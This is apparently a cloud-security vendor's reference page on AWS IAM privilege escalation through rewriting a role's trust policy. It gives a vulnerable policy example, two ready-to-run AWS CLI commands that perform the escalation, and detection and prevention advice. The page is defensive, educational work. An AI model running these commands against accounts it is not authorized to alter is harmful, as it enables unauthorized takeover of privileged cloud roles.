All IAM escalation methodsCritical severity
AWS IAM privilege escalation • iam:UpdateAssumeRolePolicy + sts:AssumeRole

iam:UpdateAssumeRolePolicy Privilege Escalation

iam:UpdateAssumeRolePolicy rewrites a role’s trust policy — the document that decides who may assume it. An attacker can point a privileged role’s trust policy at their own principal, then assume the role and take on its permissions.

Permissions an attacker needs

  • iam:UpdateAssumeRolePolicy
  • sts:AssumeRole

How the escalation works

  • The attacker identifies a role with more permissions than they have.
  • They overwrite that role’s trust policy to allow their own user or role as a trusted principal.
  • They call sts:AssumeRole and operate with the privileged role’s permissions.

Example vulnerable policy

A policy like this grants the dangerous permission. Paste your own policy into the free AI-Powered IAM analyzer to see if you are exposed.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iam:UpdateAssumeRolePolicy",
        "sts:AssumeRole"
      ],
      "Resource": "*"
    }
  ]
}

Example exploitation

For illustration only — run against accounts you own or are authorized to test.

aws iam update-assume-role-policy \
  --role-name privileged-role \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123456789012:user/attacker"},"Action":"sts:AssumeRole"}]}'
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/privileged-role --role-session-name esc

How to detect and prevent it

  • Scope iam:UpdateAssumeRolePolicy to specific, non-privileged role ARNs only.
  • Apply a permissions boundary so an assumed role’s effective permissions cannot exceed it.
  • Alert on UpdateAssumeRolePolicy in CloudTrail; trust-policy changes on privileged roles are high-signal.

FAQ

How is this different from PassRole-based escalation?

PassRole hands an existing role to a service; UpdateAssumeRolePolicy changes who is allowed to assume a role directly. Both end with the attacker holding a more privileged role, but the trust-policy rewrite is detectable as a distinct CloudTrail event.

Related escalation methods

Check your IAM policies for this — free

Shieldly's AI-Powered analyzer flags privilege-escalation paths, wildcards, and risky PassRole in seconds. No signup, no AWS credentials. Also ships as CLI, VS Code extension, GitHub Action, and CDK Guard.

Amazon Web Services (AWS) is a trademark of Amazon.com, Inc. Shieldly is not affiliated with, endorsed by, or sponsored by Amazon Web Services.